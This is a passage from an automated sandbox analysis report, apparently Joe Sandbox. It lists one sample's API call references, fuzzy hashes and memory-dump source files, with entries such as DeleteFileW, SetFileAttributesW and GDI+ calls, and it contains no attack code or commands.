                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: 4797881131b1e643516a40a0ca442e017c83e0c7e269fbde601017624883023c
                                                                                      • Instruction ID: a3165ad3e7b78834f9165c483fd9e02165506351162edffe3989dfa82131cec9
                                                                                      • Opcode Fuzzy Hash: 4797881131b1e643516a40a0ca442e017c83e0c7e269fbde601017624883023c
                                                                                      • Instruction Fuzzy Hash: D5F0C8327213287FDA115F50AC45FA77A59EF063A0F011925FA88D6261E6264C01C7B0
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00D7FCB3
                                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D7FCBA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                      • String ID:
                                                                                      • API String ID: 1231390398-0
                                                                                      • Opcode ID: 0d15bcbde3331c8d05fd53d18bbfc285e945bafa45818f1a448bae5e773d0aff
                                                                                      • Instruction ID: 81281f116e60ab2f9aea6a058bcd845f5965ecbe43607f5b2e0425d60eefcd71
                                                                                      • Opcode Fuzzy Hash: 0d15bcbde3331c8d05fd53d18bbfc285e945bafa45818f1a448bae5e773d0aff
                                                                                      • Instruction Fuzzy Hash: 48E09232E1020E678F2A8BA89C859EF779DEA45300728C17EED4ED3600FA34DD4147B4
                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A0D7
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A108
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: d785c83097a78ba3face53a98a31a6dc1504b5a3cf94d37cbfceb58b52220aa6
                                                                                      • Instruction ID: bed9a6cc057241ba9a07be08ed64a9a912a23f08d8352494fdc972fc6bc6cef8
                                                                                      • Opcode Fuzzy Hash: d785c83097a78ba3face53a98a31a6dc1504b5a3cf94d37cbfceb58b52220aa6
                                                                                      • Instruction Fuzzy Hash: 8CF0A031280209BBEF116F64EC01BDE7B6DEB04381F44C061BD88C6161EB329A989B74
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText_swprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3011073432-0
                                                                                      • Opcode ID: 0ad54ec6e2e55a697fa37d3a15ad5626923c3a429d3e1afc92041ade2eeb6401
                                                                                      • Instruction ID: 384c82cdca94da99ec00bbefab885f9de54d5ac90a163071c0eed8d8aa9e99fb
                                                                                      • Opcode Fuzzy Hash: 0ad54ec6e2e55a697fa37d3a15ad5626923c3a429d3e1afc92041ade2eeb6401
                                                                                      • Instruction Fuzzy Hash: 3EF0EC32964348F6E711B7A09C06FA93B5DEB043C1F044196F605D21A2E6715A209772
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00D79611,?,?,00D7946C), ref: 00D79DBD
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D79611,?,?,00D7946C), ref: 00D79DEB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 04594b4788f6ad4580482d99dd4029d2685507dfc2f226ef7b0598ca5634009c
                                                                                      • Instruction ID: 076dd94fed8f168f5a368fdae09b900e674b80dfcf98a26c1d7e2d0ad3c801c1
                                                                                      • Opcode Fuzzy Hash: 04594b4788f6ad4580482d99dd4029d2685507dfc2f226ef7b0598ca5634009c
                                                                                      • Instruction Fuzzy Hash: B7E09B3165120D67DB215F61DC41BDA779DEB09382F844061BA48C2154EB319D949A74
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00D79E08,?,00D775A0,?,?,?,?), ref: 00D79E24
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D79E08,?,00D775A0,?,?,?,?), ref: 00D79E50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 71dd232d3c052d0577329577e1b536232b4137f913fa13bb8044239ee77fef46
                                                                                      • Instruction ID: 1c795ac19ee5ee740c56a6de27a42ac4d65155daf91be55c88061579f397cb45
                                                                                      • Opcode Fuzzy Hash: 71dd232d3c052d0577329577e1b536232b4137f913fa13bb8044239ee77fef46
                                                                                      • Instruction Fuzzy Hash: A0E0653250125867CB11AA68DC05BDABB58DB097B1F044161FD48E3290D6705D8487F4
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
• LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Opcode ID: 9ddd74962cccc595675d56d11c6193d10c3d88868455998fff08c2f78e8e4db0
• Instruction ID: dd039f20b99000380a15243c2acbd057d52cd49559a19c397bcdb8e96fb72e0a
• Opcode Fuzzy Hash: 9ddd74962cccc595675d56d11c6193d10c3d88868455998fff08c2f78e8e4db0
• Instruction Fuzzy Hash: B2E01272811218ABDB11ABA4DC05FEB7B6CEB093D1F0440A6B948D2105DA74D9408BB4
APIs
• GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D88945
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D8894C
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: BitmapCreateFromGdipStream
• String ID:
• API String ID: 1918208029-0
• Opcode ID: 0099e471468b34c235eb2f02838c33d93cf27ac3613b0fde1beaed965040f864
• Instruction ID: 8d756c2ade3ccc623a4749dfa01474e85078996c823fc305654f326bc4d2a079
• Opcode Fuzzy Hash: 0099e471468b34c235eb2f02838c33d93cf27ac3613b0fde1beaed965040f864
• Instruction Fuzzy Hash: D9E0E575515218EFCB50FF95D5017A9B7E8EB05351F10846AE84593701D670AE04ABB1
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,00D9F79B,000000FF), ref: 00D890C7
• CoUninitialize.COMBASE(?,?,?,00D9F79B,000000FF), ref: 00D890CC
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: GdiplusShutdownUninitialize
• String ID:
• API String ID: 3856339756-0
• Opcode ID: 6b5e371c746b1e15f9d12121060072cbc5c50d4ccabf5ced5dc37b7444047d30
• Instruction ID: fa7de842bc1960154df3ff0503cb46e19c3980d36273128a753a339382e2e49a
• Opcode Fuzzy Hash: 6b5e371c746b1e15f9d12121060072cbc5c50d4ccabf5ced5dc37b7444047d30
• Instruction Fuzzy Hash: 51E01A32548644DFC710EB8CDD45B55BBE9FB09B20F008769B81AC3B60CB386844CBA1
APIs
  • Part of subcall function 00D91D9A: try_get_function.LIBVCRUNTIME ref: 00D91DAF
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D90CC4
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D90CCF
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
• String ID:
• API String ID: 806969131-0
• Opcode ID: bf06b7bb78a9771af71f7212e9ca236e4bb1192f7f90599c48c421a0b0d00f2b
• Instruction ID: 4a851211b14560ebc727343ff76fe1f06948e512a0f973e85bdcd50be2faa502
• Opcode Fuzzy Hash: bf06b7bb78a9771af71f7212e9ca236e4bb1192f7f90599c48c421a0b0d00f2b
• Instruction Fuzzy Hash: A1D0233D5483072C1F0033753C1255B2F44D502BF47700345F021D51C1DF108045D173
APIs
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
• Opcode ID: ca85c7bf17536109632d261759023f1f5f4f71b266c7d0ae14db5cbf4949e820
• Instruction ID: 80fbef5a7c9c7e19b30dc27a591aa6125d1ef4b308fa6ba223ce407621c9df52
• Opcode Fuzzy Hash: ca85c7bf17536109632d261759023f1f5f4f71b266c7d0ae14db5cbf4949e820
• Instruction Fuzzy Hash: 8EC01232058201BFCB010B74DC09C2EBBA99B96211F00CA04B4A5C0160C338C010DB32
APIs
• EnterCriticalSection.KERNEL32(00DB1E74,?,?,?,?,00D7A5A0,?,?,?,?,00D9F79B,000000FF), ref: 00D7FC42
• LeaveCriticalSection.KERNEL32(00DB1E74,?,?,?,?,00D7A5A0,?,?,?,?,00D9F79B,000000FF), ref: 00D7FC99
  • Part of subcall function 00D7F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 00D7FA05
  • Part of subcall function 00D7F9D1: CloseHandle.KERNEL32(?,?), ref: 00D7FA1F
  • Part of subcall function 00D7F9D1: DeleteCriticalSection.KERNEL32(?), ref: 00D7FA38
  • Part of subcall function 00D7F9D1: CloseHandle.KERNELBASE(?), ref: 00D7FA44
  • Part of subcall function 00D7F9D1: CloseHandle.KERNEL32(?), ref: 00D7FA50
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
• String ID:
• API String ID: 3265325312-0
• Opcode ID: 707846239a44194d89b2352d25ce22bf4574afc129c55f055640e91add2a5cf3
• Instruction ID: 8bc00b24a663d41224b3df744a4baedf4809b63de80efa6ec394f113056205ed
• Opcode Fuzzy Hash: 707846239a44194d89b2352d25ce22bf4574afc129c55f055640e91add2a5cf3
• Instruction Fuzzy Hash: EDF0A437204324DB96226724ECC09BEB71CD6867A43598626FC08A7381FB35EC0147B0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 208dc9582c64a88c71686995744490caff4f4aaa79632c57d8d756d98754bbe2
• Instruction ID: f1ee9c5eabdfcd3dc28056ee26d5f1f82ff92b2b038ac4514e8aab70926500ba
• Opcode Fuzzy Hash: 208dc9582c64a88c71686995744490caff4f4aaa79632c57d8d756d98754bbe2
• Instruction Fuzzy Hash: 80B1D378A00246AEEB29CF7CC485BB9FBA5FF05304F18835AD45D93281E7319955CBB1
APIs
• __EH_prolog.LIBCMT ref: 00D78210
  • Part of subcall function 00D7137E: __EH_prolog.LIBCMT ref: 00D71383
  • Part of subcall function 00D7137E: new.LIBCMT ref: 00D713FB
  • Part of subcall function 00D719B1: __EH_prolog.LIBCMT ref: 00D719B6
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 8ba897593f1c65978c3ba3a64c31413010345dd6c2270415ce80efc9191e9195
• Instruction ID: d0fe761b48836e8f3c3a4861ffeae9d94f1e1243dbc759d8b7b5087c12715f81
• Opcode Fuzzy Hash: 8ba897593f1c65978c3ba3a64c31413010345dd6c2270415ce80efc9191e9195
• Instruction Fuzzy Hash: 0F4186719406589ADB24EB64CC55BEA7769EF50700F4480EAE58E93053FF745EC8EB30
APIs
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 6fad3813819460f27d101c331a8c49a29ccc5f2d7d2dc7e60c1c60974f229914
• Instruction ID: aaaf6c3828a23ca1851d70c8dd6f58146a104e3150e3685c874cb2602fa2525c
• Opcode Fuzzy Hash: 6fad3813819460f27d101c331a8c49a29ccc5f2d7d2dc7e60c1c60974f229914
• Instruction Fuzzy Hash: 7E2191B1E41615ABDB14BFB9CC41B6BB6A8FB14314F04463AE909EB681E7709940C7B8
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D8948A
                                                                                        • Part of subcall function 00D7137E: __EH_prolog.LIBCMT ref: 00D71383
                                                                                        • Part of subcall function 00D7137E: new.LIBCMT ref: 00D713FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 6fea197415152e607a1501be008ef5c2d4652320f81f411bc7684cc1d60e22bd
                                                                                      • Instruction ID: 98c6b811711d1d4ef2ef83e1f6947009277af9367b417c33d8d28000b4c8ded2
                                                                                      • Opcode Fuzzy Hash: 6fea197415152e607a1501be008ef5c2d4652320f81f411bc7684cc1d60e22bd
                                                                                      • Instruction Fuzzy Hash: 56216B76C04249AACF15EF98D9519EEB7B4EF19300F1445EAE809A7202E635AE05CB70
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 116e3f9ba3860b8744da774d5b8fdb76ebed9677e6fefea93668cf1f966e4c64
                                                                                      • Instruction ID: f0bba1975c9dbaec8f1028de928450a0a837b9c240eaffb48a7cd1a393fa7c63
                                                                                      • Opcode Fuzzy Hash: 116e3f9ba3860b8744da774d5b8fdb76ebed9677e6fefea93668cf1f966e4c64
